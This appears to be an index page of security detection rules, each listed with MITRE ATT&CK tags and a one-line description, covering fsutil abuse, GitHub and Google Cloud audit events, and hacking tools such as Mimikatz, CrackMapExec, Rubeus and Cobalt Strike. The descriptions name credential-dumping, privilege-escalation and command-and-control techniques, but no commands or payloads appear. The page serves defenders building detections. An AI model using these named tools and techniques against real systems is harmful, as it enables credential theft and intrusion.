  • Fsutil Behavior Set SymlinkEvaluation

    calendar Aug 12, 2024 · attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    A symbolic link is a type of file that contains a reference to another file. This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt


    Read More
  • Fsutil Drive Enumeration

    calendar Aug 12, 2024 · attack.discovery attack.t1120  ·
    Share on: twitter facebook linkedin copy

    Attackers may leverage fsutil to enumerated connected drives.


    Read More
  • Fsutil Suspicious Invocation

    calendar Aug 12, 2024 · attack.defense-evasion attack.impact attack.t1070 attack.t1485  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). Might be used by ransomwares during the attack (seen by NotPetya and others).


    Read More
  • Function Call From Undocumented COM Interface EditionUpgradeManager

    calendar Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002  ·
    Share on: twitter facebook linkedin copy

    Detects function calls from the EditionUpgradeManager COM interface. Which is an interface that is not used by standard executables.


    Read More
  • GAC DLL Loaded Via Office Applications

    calendar Aug 12, 2024 · attack.execution attack.t1204.002  ·
    Share on: twitter facebook linkedin copy

    Detects any GAC DLL being loaded by an Office Product


    Read More
  • GALLIUM Artefacts - Builtin

    calendar Aug 12, 2024 · attack.credential-access attack.command-and-control attack.t1071 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.


    Read More
  • Gatekeeper Bypass via Xattr

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1553.001  ·
    Share on: twitter facebook linkedin copy

    Detects macOS Gatekeeper bypass via xattr utility


    Read More
  • GatherNetworkInfo.VBS Reconnaissance Script Output

    calendar Aug 12, 2024 · attack.discovery  ·
    Share on: twitter facebook linkedin copy

    Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs".


    Read More
  • Get-ADUser Enumeration Using UserAccountControl Flags

    calendar Aug 12, 2024 · attack.discovery attack.t1033  ·
    Share on: twitter facebook linkedin copy

    Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.


    Read More
  • Github Delete Action Invoked

    calendar Aug 12, 2024 · attack.impact attack.collection attack.t1213.003  ·
    Share on: twitter facebook linkedin copy

    Detects delete action in the Github audit logs for codespaces, environment, project and repo.


    Read More
  • Github Fork Private Repositories Setting Enabled/Cleared

    calendar Aug 12, 2024 · attack.persistence attack.t1020 attack.t1537  ·
    Share on: twitter facebook linkedin copy

    Detects when the policy allowing forks of private and internal repositories is changed (enabled or cleared).


    Read More
  • Github High Risk Configuration Disabled

    calendar Aug 12, 2024 · attack.credential-access attack.defense-evasion attack.persistence attack.t1556  ·
    Share on: twitter facebook linkedin copy

    Detects when a user disables a critical security feature for an organization.


    Read More
  • Github New Secret Created

    calendar Aug 12, 2024 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.initial-access attack.t1078.004  ·
    Share on: twitter facebook linkedin copy

    Detects when a user creates action secret for the organization, environment, codespaces or repository.


    Read More
  • Github Outside Collaborator Detected

    calendar Aug 12, 2024 · attack.persistence attack.collection attack.t1098.001 attack.t1098.003 attack.t1213.003  ·
    Share on: twitter facebook linkedin copy

    Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.


    Read More
  • Github Repository/Organization Transferred

    calendar Aug 12, 2024 · attack.persistence attack.t1020 attack.t1537  ·
    Share on: twitter facebook linkedin copy

    Detects when a repository or an organization is being transferred to another location.


    Read More
  • Github Secret Scanning Feature Disabled

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects if the secret scanning feature is disabled for an enterprise or repository.


    Read More
  • Github Self Hosted Runner Changes Detected

    calendar Aug 12, 2024 · attack.impact attack.discovery attack.collection attack.defense-evasion attack.persistence attack.privilege-escalation attack.initial-access attack.t1526 attack.t1213.003 attack.t1078.004  ·
    Share on: twitter facebook linkedin copy

    A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected, it should be validated from GitHub UI because the log entry may not provide full context.


    Read More
  • Github SSH Certificate Configuration Changed

    calendar Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1078.004  ·
    Share on: twitter facebook linkedin copy

    Detects when changes are made to the SSH certificate configuration of the organization.


    Read More
  • Goofy Guineapig Backdoor IOC

    calendar Aug 12, 2024 · attack.execution attack.defense-evasion detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects malicious indicators seen used by the Goofy Guineapig malware


    Read More
  • Goofy Guineapig Backdoor Potential C2 Communication

    calendar Aug 12, 2024 · attack.command-and-control detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects potential C2 communication related to Goofy Guineapig backdoor


    Read More
  • Goofy Guineapig Backdoor Service Creation

    calendar Aug 12, 2024 · attack.persistence detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects service creation persistence used by the Goofy Guineapig backdoor


    Read More
  • Google Cloud DNS Zone Modified or Deleted

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Identifies when a DNS Zone is modified or deleted in Google Cloud.


    Read More
  • Google Cloud Firewall Modified or Deleted

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562  ·
    Share on: twitter facebook linkedin copy

    Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).


    Read More
  • Google Cloud Kubernetes Admission Controller

    calendar Aug 12, 2024 · attack.persistence attack.t1078 attack.credential-access attack.t1552 attack.t1552.007  ·
    Share on: twitter facebook linkedin copy

    Identifies when an admission controller is executed in GCP Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.


    Read More
  • Google Cloud Kubernetes CronJob

    calendar Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.execution  ·
    Share on: twitter facebook linkedin copy

    Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.


    Read More
  • Google Cloud Kubernetes RoleBinding

    calendar Aug 12, 2024 · attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Detects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding.


    Read More
  • Google Cloud Kubernetes Secrets Modified or Deleted

    calendar Aug 12, 2024 · attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Identifies when the Secrets are Modified or Deleted.


    Read More
  • Google Cloud Re-identifies Sensitive Information

    calendar Aug 12, 2024 · attack.impact attack.t1565  ·
    Share on: twitter facebook linkedin copy

    Identifies when sensitive information is re-identified in google Cloud.


    Read More
  • Google Cloud Service Account Disabled or Deleted

    calendar Aug 12, 2024 · attack.impact attack.t1531  ·
    Share on: twitter facebook linkedin copy

    Identifies when a service account is disabled or deleted in Google Cloud.


    Read More
  • Google Cloud Service Account Modified

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Identifies when a service account is modified in Google Cloud.


    Read More
  • Google Cloud SQL Database Modified or Deleted

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Detect when a Cloud SQL DB has been modified or deleted.


    Read More
  • Google Cloud Storage Buckets Enumeration

    calendar Aug 12, 2024 · attack.discovery  ·
    Share on: twitter facebook linkedin copy

    Detects when storage bucket is enumerated in Google Cloud.


    Read More
  • Google Cloud Storage Buckets Modified or Deleted

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Detects when storage bucket is modified or deleted in Google Cloud.


    Read More
  • Google Cloud VPN Tunnel Modified or Deleted

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Identifies when a VPN Tunnel Modified or Deleted in Google Cloud.


    Read More
  • Google Full Network Traffic Packet Capture

    calendar Aug 12, 2024 · attack.collection attack.t1074  ·
    Share on: twitter facebook linkedin copy

    Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.


    Read More
  • Google Workspace Application Removed

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Detects when an an application is removed from Google Workspace.


    Read More
  • Google Workspace Granted Domain API Access

    calendar Aug 12, 2024 · attack.persistence attack.t1098  ·
    Share on: twitter facebook linkedin copy

    Detects when an API access service account is granted domain authority.


    Read More
  • Google Workspace MFA Disabled

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Detects when multi-factor authentication (MFA) is disabled.


    Read More
  • Google Workspace Role Modified or Deleted

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Detects when an a role is modified or deleted in Google Workspace.


    Read More
  • Google Workspace Role Privilege Deleted

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Detects when an a role privilege is deleted in Google Workspace.


    Read More
  • Google Workspace User Granted Admin Privileges

    calendar Aug 12, 2024 · attack.persistence attack.t1098  ·
    Share on: twitter facebook linkedin copy

    Detects when an Google Workspace user is granted admin privileges.


    Read More
  • GoToAssist Temporary Installation Artefact

    calendar Aug 12, 2024 · attack.command-and-control attack.t1219  ·
    Share on: twitter facebook linkedin copy

    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)


    Read More
  • Gpresult Display Group Policy Information

    calendar Aug 12, 2024 · attack.discovery attack.t1615  ·
    Share on: twitter facebook linkedin copy

    Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information


    Read More
  • Gpscript Execution

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy


    Read More
  • Grafana Path Traversal Exploitation CVE-2021-43798

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-43798 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects a successful Grafana path traversal exploitation


    Read More
  • Granting Of Permissions To An Account

    calendar Aug 12, 2024 · attack.persistence attack.t1098.003  ·
    Share on: twitter facebook linkedin copy

    Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.


    Read More
  • Greedy File Deletion Using Del

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1070.004  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.


    Read More
  • Greenbug Espionage Group Indicators

    calendar Aug 12, 2024 · attack.g0049 attack.execution attack.t1059.001 attack.command-and-control attack.t1105 attack.defense-evasion attack.t1036.005 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec


    Read More
  • Griffon Malware Attack Pattern

    calendar Aug 12, 2024 · attack.execution detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects process execution patterns related to Griffon malware as reported by Kaspersky


    Read More
  • Group Has Been Deleted Via Groupdel

    calendar Aug 12, 2024 · attack.impact attack.t1531  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks


    Read More
  • Group Membership Reconnaissance Via Whoami.EXE

    calendar Aug 12, 2024 · attack.discovery attack.t1033  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.


    Read More
  • Guacamole Two Users Sharing Session Anomaly

    calendar Aug 12, 2024 · attack.credential-access attack.t1212  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious session with two users present


    Read More
  • Guest Account Enabled Via Sysadminctl

    calendar Aug 12, 2024 · attack.initial-access attack.t1078 attack.t1078.001  ·
    Share on: twitter facebook linkedin copy

    Detects attempts to enable the guest account using the sysadminctl utility


    Read More
  • Guest User Invited By Non Approved Inviters

    calendar Aug 12, 2024 · attack.persistence attack.defense-evasion attack.t1078.004  ·
    Share on: twitter facebook linkedin copy

    Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.


    Read More
  • Guest Users Invited To Tenant By Non Approved Inviters

    calendar Aug 12, 2024 · attack.initial-access attack.t1078  ·
    Share on: twitter facebook linkedin copy

    Detects guest users being invited to tenant by non-approved inviters


    Read More
  • GUI Input Capture - macOS

    calendar Aug 12, 2024 · attack.credential-access attack.t1056.002  ·
    Share on: twitter facebook linkedin copy

    Detects attempts to use system dialog prompts to capture user credentials


    Read More
  • Gzip Archive Decode Via PowerShell

    calendar Aug 12, 2024 · attack.command-and-control attack.t1132.001  ·
    Share on: twitter facebook linkedin copy

    Detects attempts of decoding encoded Gzip archives via PowerShell.


    Read More
  • Hack Tool User Agent

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 attack.credential-access attack.t1110  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious user agent strings user by hack tools in proxy logs


    Read More
  • HackTool - ADCSPwn Execution

    calendar Aug 12, 2024 · attack.credential-access attack.t1557.001  ·
    Share on: twitter facebook linkedin copy

    Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service


    Read More
  • HackTool - BabyShark Agent Default URL Pattern

    calendar Aug 12, 2024 · attack.command-and-control attack.t1071.001  ·
    Share on: twitter facebook linkedin copy

    Detects Baby Shark C2 Framework default communication patterns


    Read More
  • HackTool - Bloodhound/Sharphound Execution

    calendar Aug 12, 2024 · attack.discovery attack.t1087.001 attack.t1087.002 attack.t1482 attack.t1069.001 attack.t1069.002 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects command line parameters used by Bloodhound and Sharphound hack tools


    Read More
  • HackTool - CACTUSTORCH Remote Thread Creation

    calendar Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1055.012 attack.t1059.005 attack.t1059.007 attack.t1218.005  ·
    Share on: twitter facebook linkedin copy

    Detects remote thread creation from CACTUSTORCH as described in references.


    Read More
  • HackTool - Certify Execution

    calendar Aug 12, 2024 · attack.discovery attack.credential-access attack.t1649  ·
    Share on: twitter facebook linkedin copy

    Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.


    Read More
  • HackTool - CobaltStrike BOF Injection Pattern

    calendar Aug 12, 2024 · attack.execution attack.t1106 attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects a typical pattern of a CobaltStrike BOF which inject into other processes


    Read More
  • HackTool - CobaltStrike Malleable Profile Patterns - Proxy

    calendar Aug 12, 2024 · attack.defense-evasion attack.command-and-control attack.t1071.001  ·
    Share on: twitter facebook linkedin copy

    Detects cobalt strike malleable profiles patterns (URI, User-Agents, Methods).


    Read More
  • HackTool - Covenant PowerShell Launcher

    calendar Aug 12, 2024 · attack.execution attack.defense-evasion attack.t1059.001 attack.t1564.003  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious command lines used in Covenant luanchers


    Read More
  • HackTool - CrackMapExec Execution

    calendar Aug 12, 2024 · attack.execution attack.persistence attack.privilege-escalation attack.credential-access attack.discovery attack.t1047 attack.t1053 attack.t1059.003 attack.t1059.001 attack.t1110 attack.t1201  ·
    Share on: twitter facebook linkedin copy

    This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.


    Read More
  • HackTool - CrackMapExec Execution Patterns

    calendar Aug 12, 2024 · attack.execution attack.t1047 attack.t1053 attack.t1059.003 attack.t1059.001 attack.s0106  ·
    Share on: twitter facebook linkedin copy

    Detects various execution patterns of the CrackMapExec pentesting framework


    Read More
  • HackTool - CrackMapExec File Indicators

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.001  ·
    Share on: twitter facebook linkedin copy

    Detects file creation events with filename patterns used by CrackMapExec.


    Read More
  • HackTool - CrackMapExec PowerShell Obfuscation

    calendar Aug 12, 2024 · attack.execution attack.t1059.001 attack.defense-evasion attack.t1027.005  ·
    Share on: twitter facebook linkedin copy

    The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.


    Read More
  • HackTool - CrackMapExec Process Patterns

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.001  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious process patterns found in logs when CrackMapExec is used


    Read More
  • HackTool - Credential Dumping Tools Named Pipe Created

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.001 attack.t1003.002 attack.t1003.004 attack.t1003.005  ·
    Share on: twitter facebook linkedin copy

    Detects well-known credential dumping tools execution via specific named pipe creation


    Read More
  • HackTool - Default PowerSploit/Empire Scheduled Task Creation

    calendar Aug 12, 2024 · attack.execution attack.persistence attack.privilege-escalation attack.s0111 attack.g0022 attack.g0060 car.2013-08-001 attack.t1053.005 attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a schtask via PowerSploit or Empire Default Configuration.


    Read More
  • HackTool - DiagTrackEoP Default Named Pipe

    calendar Aug 12, 2024 · attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege.


    Read More
  • HackTool - Dumpert Process Dumper Default File

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.001  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory


    Read More
  • HackTool - Empire PowerShell Launch Parameters

    calendar Aug 12, 2024 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious powershell command line parameters used in Empire


    Read More
  • HackTool - Empire PowerShell UAC Bypass

    calendar Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1548.002 car.2019-04-001  ·
    Share on: twitter facebook linkedin copy

    Detects some Empire PowerShell UAC bypass methods


    Read More
  • HackTool - Empire UserAgent URI Combo

    calendar Aug 12, 2024 · attack.defense-evasion attack.command-and-control attack.t1071.001  ·
    Share on: twitter facebook linkedin copy

    Detects user agent and URI paths used by empire agents


    Read More
  • HackTool - F-Secure C3 Load by Rundll32

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218.011  ·
    Share on: twitter facebook linkedin copy

    F-Secure C3 produces DLLs with a default exported StartNodeRelay function.


    Read More
  • HackTool - Hashcat Password Cracker Execution

    calendar Aug 12, 2024 · attack.credential-access attack.t1110.002  ·
    Share on: twitter facebook linkedin copy

    Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against


    Read More
  • HackTool - Htran/NATBypass Execution

    calendar Aug 12, 2024 · attack.command-and-control attack.t1090 attack.s0040  ·
    Share on: twitter facebook linkedin copy

    Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)


    Read More
  • HackTool - Hydra Password Bruteforce Execution

    calendar Aug 12, 2024 · attack.credential-access attack.t1110 attack.t1110.001  ·
    Share on: twitter facebook linkedin copy

    Detects command line parameters used by Hydra password guessing hack tool


    Read More
  • HackTool - Impacket Tools Execution

    calendar Aug 12, 2024 · attack.execution attack.t1557.001  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)


    Read More
  • HackTool - Inveigh Execution

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.001  ·
    Share on: twitter facebook linkedin copy

    Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool


    Read More
  • HackTool - Inveigh Execution Artefacts

    calendar Aug 12, 2024 · attack.command-and-control attack.t1219  ·
    Share on: twitter facebook linkedin copy

    Detects the presence and execution of Inveigh via dropped artefacts


    Read More
  • HackTool - Jlaive In-Memory Assembly Execution

    calendar Aug 12, 2024 · attack.execution attack.t1059.003  ·
    Share on: twitter facebook linkedin copy

    Detects the use of Jlaive to execute assemblies in a copied PowerShell


    Read More
  • HackTool - Koadic Execution

    calendar Aug 12, 2024 · attack.execution attack.t1059.003 attack.t1059.005 attack.t1059.007  ·
    Share on: twitter facebook linkedin copy

    Detects command line parameters used by Koadic hack tool


    Read More
  • HackTool - Koh Default Named Pipe

    calendar Aug 12, 2024 · attack.privilege-escalation attack.credential-access attack.t1528 attack.t1134.001  ·
    Share on: twitter facebook linkedin copy

    Detects creation of default named pipes used by the Koh tool


    Read More
  • HackTool - KrbRelay Execution

    calendar Aug 12, 2024 · attack.credential-access attack.t1558.003  ·
    Share on: twitter facebook linkedin copy

    Detects the use of KrbRelay, a Kerberos relaying tool


    Read More
  • HackTool - KrbRelayUp Execution

    calendar Aug 12, 2024 · attack.credential-access attack.t1558.003 attack.lateral-movement attack.t1550.003  ·
    Share on: twitter facebook linkedin copy

    Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced


    Read More
  • HackTool - LittleCorporal Generated Maldoc Injection

    calendar Aug 12, 2024 · attack.execution attack.t1204.002 attack.t1055.003  ·
    Share on: twitter facebook linkedin copy

    Detects the process injection of a LittleCorporal generated Maldoc.


    Read More
  • HackTool - Mimikatz Execution

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.001 attack.t1003.002 attack.t1003.004 attack.t1003.005 attack.t1003.006  ·
    Share on: twitter facebook linkedin copy

    Detection well-known mimikatz command line arguments


    Read More
  • HackTool - Mimikatz Kirbi File Creation

    calendar Aug 12, 2024 · attack.credential-access attack.t1558  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.


    Read More
  • HackTool - NPPSpy Hacktool Usage

    calendar Aug 12, 2024 · attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file


    Read More
  • HackTool - Potential CobaltStrike Process Injection

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1055.001  ·
    Share on: twitter facebook linkedin copy

    Detects a potential remote threat creation with certain characteristics which are typical for Cobalt Strike beacons


    Read More
  • HackTool - Potential Impacket Lateral Movement Activity

    calendar Aug 12, 2024 · attack.execution attack.t1047 attack.lateral-movement attack.t1021.003  ·
    Share on: twitter facebook linkedin copy

    Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework


    Read More
  • HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump

    calendar Aug 12, 2024 · attack.credential-access attack.t1003  ·
    Share on: twitter facebook linkedin copy

    Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.


    Read More
  • HackTool - PowerTool Execution

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files


    Read More
  • HackTool - Powerup Write Hijack DLL

    calendar Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.defense-evasion attack.t1574.001  ·
    Share on: twitter facebook linkedin copy

    Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default).


    Read More
  • HackTool - PurpleSharp Execution

    calendar Aug 12, 2024 · attack.t1587 attack.resource-development  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the PurpleSharp adversary simulation tool


    Read More
  • HackTool - Pypykatz Credentials Dumping Activity

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.002  ·
    Share on: twitter facebook linkedin copy

    Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored


    Read More
  • HackTool - Quarks PwDump Execution

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.002  ·
    Share on: twitter facebook linkedin copy

    Detects usage of the Quarks PwDump tool via commandline arguments


    Read More
  • HackTool - QuarksPwDump Dump File

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.002  ·
    Share on: twitter facebook linkedin copy

    Detects a dump file written by QuarksPwDump password dumper


    Read More
  • HackTool - RedMimicry Winnti Playbook Execution

    calendar Aug 12, 2024 · attack.execution attack.defense-evasion attack.t1106 attack.t1059.003 attack.t1218.011  ·
    Share on: twitter facebook linkedin copy

    Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility


    Read More
  • HackTool - RemoteKrbRelay Execution

    calendar Aug 12, 2024 · attack.credential-access attack.t1558.003  ·
    Share on: twitter facebook linkedin copy

    Detects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata.


    Read More
  • HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators

    calendar Aug 12, 2024 · attack.command-and-control attack.t1219  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module.


    Read More
  • HackTool - Rubeus Execution

    calendar Aug 12, 2024 · attack.credential-access attack.t1003 attack.t1558.003 attack.lateral-movement attack.t1550.003  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the hacktool Rubeus via PE information of command line parameters


    Read More
  • HackTool - Rubeus Execution - ScriptBlock

    calendar Aug 12, 2024 · attack.credential-access attack.t1003 attack.t1558.003 attack.lateral-movement attack.t1550.003  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the hacktool Rubeus using specific command line flags


    Read More
  • HackTool - SafetyKatz Dump Indicator

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.001  ·
    Share on: twitter facebook linkedin copy

    Detects default lsass dump filename generated by SafetyKatz.


    Read More
  • HackTool - SafetyKatz Execution

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.001  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the hacktool SafetyKatz via PE information and default Image name


    Read More
  • HackTool - SecurityXploded Execution

    calendar Aug 12, 2024 · attack.credential-access attack.t1555  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of SecurityXploded Tools


    Read More
  • HackTool - SharpChisel Execution

    calendar Aug 12, 2024 · attack.command-and-control attack.t1090.001  ·
    Share on: twitter facebook linkedin copy

    Detects usage of the Sharp Chisel via the commandline arguments


    Read More
  • HackTool - SharpDPAPI Execution

    calendar Aug 12, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1134.001 attack.t1134.003  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata. SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project.


    Read More
  • HackTool - SharPersist Execution

    calendar Aug 12, 2024 · attack.persistence attack.t1053  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms


    Read More
  • HackTool - SharpEvtMute Execution

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.002  ·
    Share on: twitter facebook linkedin copy

    Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs


    Read More
  • HackTool - SharpImpersonation Execution

    calendar Aug 12, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1134.001 attack.t1134.003  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively


    Read More
  • HackTool - SharpLDAPmonitor Execution

    calendar Aug 12, 2024 · attack.discovery  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.


    Read More
  • HackTool - SharpLdapWhoami Execution

    calendar Aug 12, 2024 · attack.discovery attack.t1033 car.2016-03-001  ·
    Share on: twitter facebook linkedin copy

    Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller


    Read More
  • HackTool - SharpView Execution

    calendar Aug 12, 2024 · attack.discovery attack.t1049 attack.t1069.002 attack.t1482 attack.t1135 attack.t1033  ·
    Share on: twitter facebook linkedin copy

    Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems


    Read More
  • HackTool - SILENTTRINITY Stager DLL Load

    calendar Aug 12, 2024 · attack.command-and-control attack.t1071  ·
    Share on: twitter facebook linkedin copy

    Detects SILENTTRINITY stager dll loading activity


    Read More
  • HackTool - SILENTTRINITY Stager Execution

    calendar Aug 12, 2024 · attack.command-and-control attack.t1071  ·
    Share on: twitter facebook linkedin copy

    Detects SILENTTRINITY stager use via PE metadata


    Read More
  • HackTool - Sliver C2 Implant Activity Pattern

    calendar Aug 12, 2024 · attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    Detects process activity patterns as seen being used by Sliver C2 framework implants


    Read More
  • HackTool - SysmonEnte Execution

